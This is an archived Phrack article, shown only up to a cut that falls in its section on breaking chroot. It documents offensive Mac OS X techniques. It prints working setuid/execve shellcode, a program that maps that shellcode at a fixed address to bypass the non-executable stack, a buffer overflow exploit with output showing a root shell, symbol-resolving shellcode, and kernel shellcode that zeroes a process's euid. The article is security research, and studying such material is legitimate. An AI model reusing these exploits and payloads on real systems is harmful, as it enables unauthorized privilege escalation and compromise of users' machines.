💾 Archived View for aphrack.org › issues › phrack64 › 11.gmi captured on 2021-12-03 at 14:04:38. Gemini links have been rewritten to link to archived content
-=-=-=-=-=-=-
_ _ _/B\_ _/W\_ (* *) Phrack #64 file 11 (* *) | - | | - | | | Mac OS X wars - a XNU Hope | | | | | | | | by nemo <nemo@felinemenace.org> | | | | | | | | | | (____________________________________________________) --[ Contents 1 - Introduction. 2 - Local shellcode maneuvering. 3 - Resolving symbols from Shellcode. 4 - Architecture spanning shellcode. 5 - Writing kernel level shellcode. 5.1 - Local privilege escalation 5.2 - Breaking chroot() 5.3 - Advancements 6 - Misc rootkit techniques. 7 - Universal binary infection. 8 - Cracking example - Prey 9 - Passive malware propagation with mDNS 10 - Kernel zone allocator exploitation. 11 - Conclusion 12 - References 13 - Appendix A: Code --[ 1 - Introduction This paper was written in order to document my research while playing with Mac OS X shellcode. During this process, however, the paper mutated and evolved to cover a selection of Mac OS X related topics which will hopefully make for an interesting read. Due to the growing popularity of Mac OS X on Intel over PowerPC platforms, I have mostly focused on techniques for the former. Many of the concepts shown are still applicable on PowerPC architecture, but their particular implementation is left as an excercise for the reader. There are already several well written documents on PowerPC and Intel assembly language; I will therefore make no attempt to try and teach you these things. If you have any suggestions on how to shorten/tighten the code I have written for this paper please drop me an email with the details at: nemo@felinemenace.org. A tar file containing the full code listings referenced in this paper can be found in Appendix A. --[ 2 - Local shellcode maneuvering. Over the years there have been many different techniques developed to calculate valid return addresses when exploiting buffer overflows in applications local to your system. Unfortunately many of these techniques are now obsolete on Intel-based Mac OS X systems with the introduction of a non-executable stack in version 10.4 (Tiger). In the following subsections I will discuss a few historical approaches for calculating shellcode addresses in memory and introduce a new method for positioning shellcode at a fixed location in the address space of a vulnerable target process. --[ 2.1 Historical perspective 1: Aleph1 Over the years there have been many different techniques developed to calculate a valid return address when exploiting a buffer overflow in an application local to your system. The most widely known of these is shown in aleph1's "Smashing the Stack for Fun and Profit". [9] In this paper, aleph1 simply writes a small function get_sp() shown below. unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } This function returns the current stack pointer (esp). aleph1 then simply offsets from this value, in an attempt to hit the nop sled before his shellcode on the stack. This method is not as precise as it can be, and also requires the shellcode to be stored on the stack. This is an obvious issue if your stack is non-executable. --[ 2.2 Historical perspective 2: Radical Environmentalist Another method for storing shellcode and calculating the address of it inside another process is shown in the Radical Environmentalist paper written by the Netric Security Group [10]. In this paper, the author shows that the execve() syscall allows full control over the stack of the freshly executed process. Because of this, shellcode can be stored in an environment variable, the address of which can be calculated as displacement from the top of the stack. In older exploits for Mac OS X (prior to 10.4), this technique worked quite well. Since there is no non-executable stack on PowerPC --[ 2.3 Beating stack prot :P or whatever In KF's paper "Non eXecutable Stack Loving on Mac OS X86" [11], the author demonstrates a technique for removing stack protection by returning into mprotect() in libSystem (libc) before returning into their payload. While this technique is very useful for remote exploitation, a more elegant solution to this problem exists for local exploitation. The first step to getting our shellcode in place is to get some shellcode. There has already been significant published work in this area. If you are interested to learn how to write shellcode for Mac OS X for use in local privilege escalation exploits, a couple of papers you should definitely check out are shown in the references section. [1] and [8]. The shellcode chosen for the sample code is described in full in section 2 of this paper. The method which I now propose relies on an undocumented the undocumented Mac OS X system call "shared_region_mapping_np". This syscall is used at runtime by the dynamic loader (dyld) to map widely used libraries across the address space of every process on the system; this functionality has many evil uses. The file /usr/include/sys/syscalls.h contains the syscall number for each of the syscalls. Here is the appropriate line in that file which contains our syscall. #define SYS_shared_region_map_file_np 299 Here is the prototype for this syscall: struct shared_region_map_file_np( int fd, uint32_t mappingCount, user_addr_t mappings, user_addr_t slide_p ); The arguments to this syscall are very simple: fd an open file descriptor, providing access to data that we want loaded in memory. mappingCount the number of mappings which we want to make from the file. mappings a pointer to an array of _shared_region_mapping_np structs which describe each mapping (see below). slide_p determines whether the syscall is allowed to slide the mapping around inside the shared region of memory to make it fit. Here is the struct definition for the elements of the third argument: struct _shared_region_mapping_np { mach_vm_address_t address; mach_vm_size_t size; mach_vm_offset_t file_offset; vm_prot_t max_prot; vm_prot_t init_prot; }; The struct elements shown above can be explained as followed: address the address in the shared region where the data should be stored. size the size of the mapping (in bytes) file_offset the offset into the file descriptor to which we must seek in order to reach the start of our data. max_prot This is the maximum protection of the mapping, this value is created by or'ing the #defines: VM_PROT_EXECUTE,VM_PROT_READ,VM_PROT_WRITE and VM_COW. init_prot This is the initial protection of the mapping, again this is created by or'ing the values mentioned above. The following #define's describe the shared region in which we can map our data. They show the various regions within the 0x00000000->0xffffffff address space which are available to use as shared regions. These are shown as defined as starting point, followed by size. #define SHARED_LIBRARY_SERVER_SUPPORTED #define GLOBAL_SHARED_TEXT_SEGMENT 0x90000000 #define GLOBAL_SHARED_DATA_SEGMENT 0xA0000000 #define GLOBAL_SHARED_SEGMENT_MASK 0xF0000000 #define SHARED_TEXT_REGION_SIZE 0x10000000 #define SHARED_DATA_REGION_SIZE 0x10000000 #define SHARED_ALTERNATE_LOAD_BASE 0x09000000 To reduce the chance that our shellcode offset will be stored at an address that does not contain a NULL byte (thereby making this technique viable for string based overflows), we position the shellcode at the last address in the region where a page (0x1000 bytes) can be mapped. By doing so, our shellcode will be stored at the address 0x9ffffxxx. The following code can be used to map some shellcode into a fixed location by opening the file "/tmp/mapme" and writing our shellcode out to it. It then uses the file descriptor to call the "shared_region_map_file_np" which maps the code, as well as a bunch of int3's (cc), into the shared region. /*-------------------------------------------------------- * [ sharedcode.c ] * * by nemo@felinemenace.org 2007 */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <sys/syscall.h> #include <sys/types.h> #include <mach/vm_prot.h> #include <mach/i386/vm_types.h> #include <mach/shared_memory_server.h> #include <string.h> #include <unistd.h> #define BASE_ADDR 0x9ffff000 #define PAGESIZE 0x1000 #define FILENAME "/tmp/mapme" char dual_sc[] = "\x5f\x90\xeb\x60" // setuid() seteuid() "\x38\x00\x00\xb7\x38\x60\x00\x00" "\x44\x00\x00\x02\x38\x00\x00\x17" "\x38\x60\x00\x00\x44\x00\x00\x02" // ppc execve() code by b-r00t "\x7c\xa5\x2a\x79\x40\x82\xff\xfd" "\x7d\x68\x02\xa6\x3b\xeb\x01\x70" "\x39\x40\x01\x70\x39\x1f\xfe\xcf" "\x7c\xa8\x29\xae\x38\x7f\xfe\xc8" "\x90\x61\xff\xf8\x90\xa1\xff\xfc" "\x38\x81\xff\xf8\x38\x0a\xfe\xcb" "\x44\xff\xff\x02\x7c\xa3\x2b\x78" "\x38\x0a\xfe\x91\x44\xff\xff\x02" "\x2f\x62\x69\x6e\x2f\x73\x68\x58" // seteuid(0); "\x31\xc0\x50\xb0\xb7\x6a\x7f\xcd" "\x80" // setuid(0); "\x31\xc0\x50\xb0\x17\x6a\x7f\xcd" "\x80" // x86 execve() code / nemo "\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3\x50" "\x54\x54\x53\x53\xb0\x3b\xcd\x80"; struct _shared_region_mapping_np { mach_vm_address_t address; mach_vm_size_t size; mach_vm_offset_t file_offset; vm_prot_t max_prot; /* read/write/execute/COW/ZF */ vm_prot_t init_prot; /* read/write/execute/COW/ZF */ }; int main(int argc,char **argv) { int fd; struct _shared_region_mapping_np sr; chr data[PAGESIZE] = { 0xcc }; char *ptr = data + PAGESIZE - sizeof(dual_sc); sr.address = BASE_ADDR; sr.size = PAGESIZE; sr.file_offset = 0; sr.max_prot = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE; sr.init_prot = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE; if((fd=open(FILENAME,O_RDWR|O_CREAT))==-1) { perror("open"); exit(EXIT_FAILURE); } memcpy(ptr,dual_sc,sizeof(dual_sc)); if(write(fd,data,PAGESIZE) != PAGESIZE) { perror("write"); exit(EXIT_FAILURE); } if(syscall(SYS_shared_region_map_file_np,fd,1,&sr,NULL)==-1) { perror("shared_region_map_file_np"); exit(EXIT_FAILURE); } close(fd); unlink(FILENAME); printf("[+] shellcode at: 0x%x.\n",sr.address + PAGESIZE - sizeof(dual_sc)); exit(EXIT_SUCCESS); } /*---------------------------------------------------------*/ When we compile and execute this code, it prints the address of the shellcode in memory. You can see this below. -[nemo@fry:~/code]$ gcc sharedcode.c -o sharedcode -[nemo@fry:~/code]$ ./sharedcode [+] shellcode at: 0x9fffff71. As you can see the address used for our shellcode is 0x9fffff71. This address, as expected, is free of NULL bytes. You can test that this procedure has worked as expected by starting a new process and connecting to it with gdb. By jumping to this address using the "jump" command in gdb our shellcode is executed and a bash prompt is displayed. -[nemo@fry:~/code]$ gdb /usr/bin/id GNU gdb 6.3.50-20050815 (Apple version gdb-563) (gdb) r Starting program: /usr/bin/id ^C[Switching to process 752 local thread 0xf03] 0x8fe01010 in __dyld__dyld_start () Quit (gdb) jump *0x9fffff71 Continuing at 0x9fffff71. (gdb) c Continuing. -[nemo@fry:Users/nemo/code]$ In order to demonstrate how this can be used in an exploit, I have created a trivially exploitable program: /* * exploitme.c */ int main(int ac, char **av) { char buf[50] = { 0 }; printf("%s",av[1]); if(ac == 2) strcpy(buf,av[1]); return 1; } Below is the exploit for the above program. /* * [ exp.c ] * nemo@felinemeance.org 2007 */ #include <stdio.h> #include <stdlib.h> #define VULNPROG "./exploitme" #define OFFSET 66 #define FIXEDADDR 0x9fffff71 int main(int ac, char **av) { char evilbuff[OFFSET]; char *args[] = {VULNPROG,evilbuff,NULL}; char *env[] = {"TERM=xterm",NULL}; long *ptr = (long *)&(evilbuff[OFFSET - 4]); memset(evilbuff,'A',OFFSET); *ptr = FIXEDADDR; execve(*args,args,env); return 1; } As you can see we fill the buffer up with "A"'s, followed by our return address calculated by sharedcode.c. After the strcpy() occurs our stored return address on the stack is overwritten with our new return address (0x9fffff71) and our shellcode is executed. If we chown root /exploitme; chmod +s /exploitme; we can see that our shellcode is mapped into suid processes, which makes this technique feasible for local privilege escalation. Also, because we control the memory protection on our mapping, we bypass non-executable stack protection. -[nemo@fry:/]$ ./exp fry:/ root# id uid=0(root) One limitation of this technique is that the file you are mapping into the shared region must exist on the root file- system. This is clearly explained in the comment below. /* * The split library is not on the root filesystem. We don't * want to pollute the system-wide ("default") shared region * with it. * Reject the mapping. The caller (dyld) should "privatize" * (via shared_region_make_private()) the shared region and * try to establish the mapping privately for this process. */ ] Another limitation to this technique is that Apple have locked down this syscall with the following lines of code: * * This system call is for "dyld" only. * Luckily we can beat this magnificent protection by.... completely ignoring it. --[ 3 - Resolving Symbols From Shellcode In this section I will demonstrate a method which can be used to resolve the address of a symbol from shellcode. This is useful in remote exploitation where you wish to access or modify some of the functionality of the vulnerable program. This may also be useful in calling some of the functions in a particular shared library in the address space. The examples in this section are written in Intel assembly, nasm syntax. The concepts presented can easily be recreated in PowerPC assembler. If anyone takes the time to do this let me know. The method I will describe requires some basic knowledge about the Mach-O object format and how symbols are stored/resolved. I will try to be as verbose as I can, however if more research is required check out the Mach-O Runtime document from the Apple website. [4] The process of resolving symbols which I am describing in this section involves locating the LINKEDIT section in memory. The LINKEDIT section is broken up into a symbol table (symtab) and string table (strtab) as follows: [ LINKEDIT SECTION ] low memory: 0x0 .________________________________, |---(symtab data starts here.)---| |<nlist struct> | |<nlist struct> | |<nlist struct> | | ... | |---(strtab data starts here.)---| |"_mh_execute_header\0" | |"dyld_start\0" | |"main" | | ... | :________________________________; himem : 0xffffffff By locating the start of the string table and the start of the symbol table relative to the address of the LINKEDIT section it is then possible to loop through each of the nlist structures in the symbol table and access their appropriate string in the string table. I will now run through this technique in fine detail. To resolve symbols we will start by locating the mach_header in memory. This will be the start of our mapped in mach-o image. One way to find this is to run the "nm" command on our binary and locate the address of the __mh_execute_header symbol. Currently on Mac OS X, the executable is simply mapped in at the start of the first page. 0x1000. We can verify this as follows: -[nemo@fry:~]$ nm /bin/sh | grep mh_ 00001000 A __mh_execute_header (gdb) x/x 0x1000 0x1000: 0xfeedface As you can see the magic number (0xfeedface) is at 0x1000. This is our Mach-O header. The struct for this is shown below: struct mach_header { uint32_t magic; cpu_type_t cputype; cpu_subtype_t cpusubtype; uint32_t filetype; uint32_t ncmds; uint32_t sizeofcmds; uint32_t flags; }; In my shellcode I assume that the file we are parsing always has a LINKEDIT section and a symbol table load command (LC_SYMTAB). This means that I do not bother parsing the mach_header struct. However if you do not wish to make this assumption, it is easy enough to loop ncmds number of times while parsing the load commands. Directly after the mach_header struct in memory are a bunch of load_commands. Each of these commands begins with a "cmd" id field, and the size of the command. Therefore, we start our code by setting ecx to the address of the first load command, directly after the mach_header struct in memory. This positions us at 0x101c. We then null out some of the registers to use later in the code. ;# null out some stuff (ebx,edx,eax) xor ebx,ebx mul ebx ;# position ecx past the mach_header. xor ecx,ecx mov word cx,0x101c For symbol resolution, we are only interested in LC_SEGMENT commands and the LC_SYMTAB. In particular we are looking for the LINKEDIT LC_SEGMENT struct. This is explained in more detail later. The #define's for these are in /usr/include/mach-o/loader.h as follows: #define LC_SEGMENT 0x1 /* segment of this file to be mapped */ #define LC_SYMTAB 0x2 /* link-edit stab symbol table info */ The LC_SYMTAB command uses the following struct: struct symtab_command { uint_32 cmd; uint_32 cmdsize; uint_32 symoff; uint_32 nsyms; uint_32 stroff; uint_32 strsize; }; The symoff field holds the offset from the start of the file to the symbol table. The stroff field holds the offset to the string table. Both the symbol table and string table are contained in the LINKEDIT section. By subtracting the symoff from the stroff we get the offset into the LINKEDIT section in which to read our strings. The nsyms field can be used as a loop count when enumerating the symtab. For the sake of this sample code, however,i have assumed that the symbol exists and ignored the nsyms field entirely. We find the LC_SYMTAB command simply by looping through and checking the "cmd" field for 0x2. The LINKEDIT section is slightly harder to find; we need to look for a load command with the cmd type 0x1 (segment_command), then check for the name "__LINKEDIT" in the segname field of the struct. The segment_command struct is shown below: struct segment_command { uint32_t cmd; uint32_t cmdsize; char segname[16]; uint32_t vmaddr; uint32_t vmsize; uint32_t fileoff; uint32_t filesize; vm_prot_t maxprot; vm_prot_t initprot; uint32_t nsects; uint32_t flags; }; I will now run through an explanation of the assembly code used to accomplish this technique. I have used a trivial state machine to loop through each load_command until both the symbol table and LINKEDIT virtual addresses have been found. First we check which type of load_command each is and then we jump to the appropriate handler, if it is one of the types we need. next_header: cmp byte [ecx],0x2 ;# test for LC_SYMTAB (0x2) je found_lcsymtab cmp byte [ecx],0x1 ;# test for LC_SEGMENT (0x1) je found_lcsegment The next two instructions add the length field of the load_command to our pointer. This positions us over the cmd field of the next load_command in memory. We jump back up to the next_header symbol and compare again. next: add ecx,[ecx + 0x4] ;# ecx += length jmp next_header The found_lcsymtab handler is called when we have a cmd == 0x2. We make the assumption that there's only one LC_SYMTAB. We can use the fact that if we're here, eax hasn't been set yet and is 0. By comparing this with edx we can see if the LINKEDIT segment has been found. After the cmp, we update eax with the address of the LC_SYMTAB. If both the LINKEDIT and LC_SYMTAB sections have been found, we jmp to the "found_both" symbol, otherwise we process the next header. found_lcsymtab: cmp eax,edx ;# use the fact that eax is 0 to test edx. mov eax,ecx ;# update eax with current pointer. jne found_both ;# we have found LINKEDIT and LC_SYMTAB jmp next ;# keep looking for LINKEDIT The found_lcsegment handler is very similar to the found_lcsymtab code. However, since there are many LC_SEGMENT commands in most files we need to be sure that we've found the __LINKEDIT section. To do this we add 8 to the struct pointer to get to the segname[] string. We then check 2 characters in, skipping the "__" for the 4 bytes "LINK". 0x4b4e494c accounting for endian issues. Again, we use the fact that there should only be one LINKEDIT section. This means that if we are past the check for "LINK" edx is 0. We use this to test eax, to see if the LC_SYMTAB command has been found. Again if we are done we jmp to found_both, if not back up to the "next_header" symbol. found_lcsegment: lea esi,[ecx + 0x8] ;# get pointer to name ;# test for "LINK" cmp long [esi + 0x2],0x4b4e494c jne next ;# it's not LINKEDIT, NEXT! cmp edx,eax ;# use zero'ed edx to test eax mov edx,ecx ;# set edx to current address jne found_both ;# we're done! jmp next ;# still need to find ;# LC_SYMTAB, continue ;# EDX = LINKEDIT struct ;# EAX = LC_SYMTAB struct Now that we have our pointers to LINKEDIT and LC_SYMTAB, we can subtract symtab_command.symoff from symtab_command.stroff to obtain the offset of the strings table from the start of LINKEDIT. By adding this offset to LINKEDIT's virtual address, we have now calculated the virtual address of the string table in memory. found_both: mov edi,[eax + 0x10] ;# EDI = stroff sub edi,[eax + 0x8] ;# EDI -= symoff mov esi,[edx + 0x18] ;# esi = VA of linkedit add edi,esi ;# add virtual address of LINKEDIT to offset The LINKEDIT section contains a list of "struct nlist" structures. Each one corresponds to a symbol. The first union contains an offset into the string table (which we have the VA for). In order to find the symbol we want we simply cycle through the array and offset our string table pointer to test the string. struct nlist { union { #ifndef __LP64__ char *n_name; #endif int32_t n_strx; } n_un; uint8_t n_type; uint8_t n_sect; int16_t n_desc; uint32_t n_value; }; ] Now that we are able to walk through our nlist structs we are good to go. However it wouldn't make sense to store the full symbol name in our shellcode as this would make the code larger than it already is. ;/ I have chosen to steal^H^H^H^Huse skape's "compute_hash" function from "Understanding Windows Shellcode" [5]. He explains how the code works in his paper. The following code shows a simple loop. First we jump down to the "hashes" symbol, and call back up to get a pointer to our list of hashes. We read the first hash in, and then loop through each of the nlist structures, hashing the symbol found and comparing it against our precomputed hash. If the hash is unsuccessful we jump back up to "check_next_hash", however if it's successful we continue down to the "done" symbol. ;# esi == constant pointer to nlist ;# edi == strtab base lookup_symbol: jmp hashes lookup_symbol_up: pop ecx mov ecx,[ecx] ;# ecx = first hash check_next_hash: push esi ;# save nlist pointer push edi ;# save VA of strtable mov esi,[esi] ;# *esi = offset from strtab to string add esi,edi ;# add VA of strtab compute_hash: xor edi, edi xor eax, eax cld compute_hash_again: lodsb test al, al ;# test if on the last byte. jz compute_hash_finished ror edi, 0xd add edi, eax jmp compute_hash_again compute_hash_finished: cmp edi,ecx pop edi pop esi je done lea esi,[esi + 0xc] ;# Add sizeof(struct nlist) jmp check_next_hash done: Each hash we wish to resolve can be appended after the hashes: symbol. ;# hash in edi hashes: call lookup_symbol_up dd 0x8bd2d84d Now that we have the address of our symbol we're all done and can call our function, or modify it as we need. In order to calculate the hash for our required symbol, I have cut and paste some of skapes code into a little c progam as follows: #include <stdio.h> #include <stdlib.h> char chsc[] = "\x89\xe5\x51\x60\x8b\x75\x04\x31" "\xff\x31\xc0\xfc\xac\x84\xc0\x74" "\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4" "\x89\x7d\xfc\x61\x58\x89\xec\xc3"; int main(int ac, char **av) { long (*hashstr)() = (long (*)())chsc; if(ac != 2) { fprintf(stderr,"[!] usage: %s <string to hash>\n",*av); exit(1); } printf("[+] Hash: 0x%x\n",hashstr(av[1])); return 0; } We can run this as shown below to generate our hash: -[nemo@fry:~/code/kernelsc]$ ./comphash _do_payload [+] Hash: 0x8bd2d84d If the symbol we have resolved is a function that we wish to call there is a little more we must do before this is possible. Mac OS X's linker, by default, uses lazy binding for external symbols. This means that if our intended function calls another function in an external library, which hasn't been called elsewhere in the program already, the dynamic linker will try to resolve the address as you call it. For example, a call to execve() with lazy binding will be replaced with a call to dyld_stub_execve() as shown below: 0x1f54 <do_payload+78>: call 0x301b <dyld_stub_execve> At runtime this function contains one instruction: call 0x8fe12f70 <__dyld_fast_stub_binding_helper_interface> This invokes the dyld which resolves the symbol and replaces this instruction with a jmp to the real code: jmp 0x9003b7d0 <execve> The only problem which this causes is that this function requires the stack pointer to be correctly aligned, otherwise our code will crash. To do this we simply subtract 0xc from our stack pointer before calling our function. Note: This will not be necessary if the program you are exploiting has been compiled with the -bind_at_load flag. Here is the code I have used to make the call. done: mov eax,[esi + 0x8] ;# eax == value xchg esp,edx ;# annoyingly large sub dl,0xc ;# way to align the stack pointer xchg esp,edx ;# without null bytes. call eax xchg esp,edx ;# annoyingly large add dl,0xc ;# way to fix up the stack pointer xchg esp,edx ;# without null bytes. ret I have written a small sample c program to demonstrate this code in action. The following code has no call to do_payload(). The shellcode will resolve the address of this function and call it. #include <stdio.h> #include <stdlib.h> char symresolve[] = "\x31\xdb\xf7\xe3\x31\xc9\x66\xb9\x1c\x10\x80\x39\x02\x74\x0a\x80" "\x39\x01\x74\x0d\x03\x49\x04\xeb\xf1\x39\xd0\x89\xc8\x75\x16\xeb" "\xf3\x8d\x71\x08\x81\x7e\x02\x4c\x49\x4e\x4b\x75\xe7\x39\xc2\x89" "\xca\x75\x02\xeb\xdf\x8b\x78\x10\x2b\x78\x08\x8b\x72\x18\x01\xf7" "\xeb\x39\x59\x8b\x09\x56\x57\x8b\x36\x01\xfe\x31\xff\x31\xc0\xfc" "\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x39\xcf\x5f\x5e" "\x74\x05\x8d\x76\x0c\xeb\xde\x8b\x46\x08\x87\xe2\x80\xea\x0c\x87" "\xe2\xff\xd0\x87\xe2\x80\xc2\x0c\x87\xe2\xc3\xe8\xc2\xff\xff\xff" "\x4d\xd8\xd2\x8b"; // HASH void do_payload() { char *args[] = {"/usr/bin/id",NULL}; char *env[] = {"TERM=xterm",NULL}; printf("[+] Executing id.\n"); execve(*args,args,env); } int main(int ac, char **av) { void (*fp)() = (void (*)())symresolve; fp(); return 0; } As you can see below this code works as you'd expect. -[nemo@fry:~]$ ./testsymbols [+] Executing id. uid=501(nemo) gid=501(nemo) groups=501(nemo) The full assembly listing for the method shown in this section is shown in the Appendix for this paper. I originally worked on this method for resolving kernel symbols. Unfortunately, the kernel jettisons (free()'s) the LINKEDIT section after it boots. Before doing this, it writes out the mach-o file /mach.sym containing the symbol information for the kernel. If you set the boot flag "keepsyms" the LINKEDIT section will not be free()'ed and the symbols will remain in kernel memory. In this case we can use the code shown in this section, and simply scan memory starting from the address 0x1000 until we find 0xfeedface. Here is some assembly code to do this: SECTION .text _main: xor eax,eax inc eax shl eax,0xc ;# eax = 0x1000 mov ebx,0xfeedface ;# ebx = 0xfeedface up: inc eax inc eax inc eax inc eax ;# eax += 4 cmp ebx,[eax] ;# if(*eax != ebx) { jnz up ;# goto up } ret After this is done we can resolve kernel symbols as needed. --[ 4 - Architecture Spanning Shellcode Since the move from PowerPC to Intel architecture it has become common to find both PowerPC and Intel Macs running Mac OS X in the wild. On top of this, Mac OS X 10.4 ships with virtualization technology from Transitive called Rosetta which allows an Intel Mac toexecute a PowerPC binary. This means that even after you've finger-printed the architecture of a machine as Intel, there's a chance a network facing daemon might be running PowerPC code. This poses a challenge when writing remote exploits as it is harder incorrectly fingerprinting the architecture of the machine will result in failure. In order to remedy this a technique can be used to create shellcode which executes on both Intel and PowerPC architecture. This technique has been documented in the Phrack article of the same name as this section [16]. I provide a brief explanation here as this technique is used throughout the remainder of the paper. The basic premise of this technique is to find a PowerPC instruction which, when executed, will simply step forward one instruction. It must do this without performing any memory access, only changing the state of the registers. When this instruction is interpreted as Intel opcodes however, a jump must be performed. This jump must be over the PowerPC portion of the code and into the Intel instructions. In this way the architecture type can be determined. A suitable PowerPC instruction exists. This is the "rlwnm" instruction. The following is the definition of this instruction, taken from the PowerPC manual: (rlwnm) Rotate Left Word then AND with Mask (x'5c00 0000') rlwnm rA,rS,rB,MB,ME (Rc = 0) rlwnm. rA,rS,rB,MB,ME (Rc = 1) ,__________________________________________________________. |10101 | S | A | B | MB | ME |Rc| ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' 0 5 6 10 11 15 16 20 21 25 26 30 31 This is the rotate left instruction on PowerPC. Basically a mask, (defined by the bits MB to ME) is applied and the register rS is rotated rB bits. The result is stored in rA. No memory access is made by this instruction regardless of the arguments given. By using the following parameters for this instruction we can end up with a valid and useful opcode. rA = 16 rS = 28 rB = 29 MB = XX ME = XX rlwnm r16,r28,r29,XX,XX This leaves us with the opcode: "\x5f\x90\xeb\xxx" When this is broken down as Intel code it becomes the following instructions: nasm > db 0x5f,0x90,0xeb,0xXX 00000000 5F pop edi // move edi to the stack 00000001 90 nop // do nothing. 00000002 EBXX jmp short 0xXX // jump to our payload. Here is a small example of how this can be useful. char trap[] = "\x5f\x90\xeb\x06" // magic arch selector "\x7f\xe0\x00\x08" // trap ppc instruction "\xcc\xcc\xcc\xcc"; // intel: int3 int3 int3 int3 This shellcode when executed on PowerPC architecture will execute the "trap" instruction directly below our selector code. However when this is interpreted as Intel architecture instructions the "eb 06" causes a short jump to the int3 instructions. The reason 06 rather than 04 is used for our jmp short value here is that eip is pointing to the start of the jmp instruction itself (eb) during execution. Therefore, the jmp instruction needs to compensate by adding two bytes to the lenth of the PowerPC assembly. To verify that this multi-arch technique works, here is the output of gdb when attached to this process on Intel architecture: Program received signal SIGTRAP, Trace/breakpoint trap. 0x0000201b in trap () (gdb) x/i $pc 0x201b <trap+11>: int3 Here is the same output from a PowerPC version of this binary: Program received signal SIGTRAP, Trace/breakpoint trap. 0x00002018 in trap () (gdb) x/i $pc 0x2018 <trap+4>: trap --[ 5 - Writing Kernel level shellcode In this section we will look at some techniques for writing shellcode for use when exploiting kernel level vulnerabilities. A couple of things to note before we begin. Mac OS X does not share an address space for kernel/user space. Both the kernel and userspace have a 4gb address space each (0x0 -> 0xffffffff). I did not bother with writing PowerPC code again for most of what I've done, if you really want PowerPC code some concepts here will quickly port others require a little thought ;). --[ 5.1 - Local privilege escalation The first type of kernel shellcode we will look at writing is for local vulnerabilities. The typical objective for local kernel shellcode is simply to escalate the privileges of our userspace process. This topic was covered in noir's excellent paper on OpenBSD kernel exploitation in Phrack 60. [6] A lot of the techniques from noir's paper apply directly to Mac OS X. noir shows that the sysctl() function can be used to retrieve the kinfo_proc struct for a particular process id. As you can see below one of the members of the kinfo_proc struct is a pointer to the proc struct. struct kinfo_proc { struct extern_proc kp_proc; /* proc structure */ struct eproc { struct proc *e_paddr; /* address of proc */ struct session *e_sess; /* session pointer */ struct _pcred e_pcred; /* process credentials */ struct _ucred e_ucred; /* current credentials */ struct vmspace e_vm; /* address space */ pid_t e_ppid; /* parent process id */ pid_t e_pgid; /* process group id */ short e_jobc; /* job control counter */ dev_t e_tdev; /* controlling tty dev */ pid_t e_tpgid; /* tty process group id */ struct session *e_tsess; /* tty session pointer */ #define WMESGLEN 7 char e_wmesg[WMESGLEN+1]; /* wchan message */ segsz_t e_xsize; /* text size */ short e_xrssize; /* text rss */ short e_xccount; /* text references */ short e_xswrss; int32_t e_flag; #define EPROC_CTTY 0x01 /* controlling tty vnode active */ #define EPROC_SLEADER 0x02 /* session leader */ #define COMAPT_MAXLOGNAME 12 char e_login[COMAPT_MAXLOGNAME];/* short setlogin() name*/ int32_t e_spare[4]; } kp_eproc; }; Ilja van Sprundel mentioned this technique in his talk at Blackhat [7]. Basically, we can use the leaked address "p.kp_eproc.ep_addr" to access the proc struct for our process in memory. The following function will return the address of a pid's proc struct in the kernel. long get_addr(pid_t pid) { int i, sz = sizeof(struct kinfo_proc), mib[4]; struct kinfo_proc p; mib[0] = CTL_KERN; mib[1] = KERN_PROC; mib[2] = KERN_PROC_PID; mib[3] = pid; i = sysctl(&mib, 4, &p, &sz, 0, 0); if (i == -1) { perror("sysctl()"); exit(0); } return(p.kp_eproc.e_paddr); } Now that we have the address of our proc struct, we simply have to change our uid and/or euid in their respective structures. Here is a snippet from the proc struct: struct proc { LIST_ENTRY(proc) p_list; /* List of all processes. */ /* substructures: */ struct ucred *p_ucred; /* Process owner's identity. */ struct filedesc *p_fd; /* Ptr to open files structure. */ struct pstats *p_stats; /* Accounting/statistics (PROC ONLY). */ struct plimit *p_limit; /* Process limits. */ struct sigacts *p_sigacts; /* Signal actions, state (PROC ONLY). */ ... } As you can see, following the p_list there is a pointer to the ucred struct. This struct is shown below. struct _ucred { int32_t cr_ref; /* reference count */ uid_t cr_uid; /* effective user id */ short cr_ngroups; /* number of groups */ gid_t cr_groups[NGROUPS]; /* groups */ }; By changing the cr_uid field in this struct, we set the euid of our process. The following assembly code will seek to this struct and null out the ucred cr_uid field. This leaves us with root privileges on an Intel platform. SECTION .text _main: mov ebx, [0xdeadbeef] ;# ebx = proc address mov ecx, [ebx + 8] ;# ecx = ucred xor eax,eax mov [ecx + 12], eax ;# zero out the euid ret To use this code we need to replace the address 0xdeadbeef with the address of the proc struct which we looked up earlier. Here is some code from Ilja van Sprundel's talk which does the same thing on a PowerPC platform. int kshellcode[] = { 0x3ca0aabb, // lis r5, 0xaabb 0x60a5ccdd, // ori r5, r5, 0xccdd 0x80c5ffa8, // lwz r6, Â88(r5) 0x80e60048, // lwz r7, 72(r6) 0x39000000, // li r8, 0 0x9106004c, // stw r8, 76(r6) 0x91060050, // stw r8, 80(r6) 0x91060054, // stw r8, 84(r6) 0x91060058, // stw r8, 88(r6) 0x91070004 // stw r8, 4(r7) } We can combine the two shellcodes into one architecture spanning shellcode. This is a simple process and is documented in section 4 of this paper. The full listing for our multi-arch code is shown in the Appendix. On PowerPC processors XNU uses an optimization referred to as the "user memory window". This means that the user address space and the kernel address space share some mappings. This design is in place for copyin/copyout etc to use. The user memory window typically starts at 0xe0000000 in both the kernel and user address space. This can be useful when trying to position shellcode for use in local privilege escalation vulnerabilities. --[ 5.2 - Breaking chroot() Before we look into how we can go about breaking out of processes after they have used the chroot() syscall, we will a look at why, a lot of the time, we don't need to. -[root@fry:/chroot]# touch file_outside_chroot -[root@fry:/chroot]# ls -lsa file_outside_chroot 0 -rw-r--r-- 1 root admin 0 Jan 29 12:17 file_outside_chroot -[root@fry:/chroot]# chroot demo /bin/sh -[root@fry:/]# ls -lsa file_outside_chroot ls: file_outside_chroot: No such file or directory -[root@fry:/]# pwd / -[root@fry:/]# ls -lsa ../file_outside_chroot 0 -rw-r--r-- 1 root admin 0 Jan 29 20:17 ../file_outside_chroot -[root@fry:/]# ../../usr/sbin/chroot ../../ /bin/sh -[root@fry:/]# ls -lsa 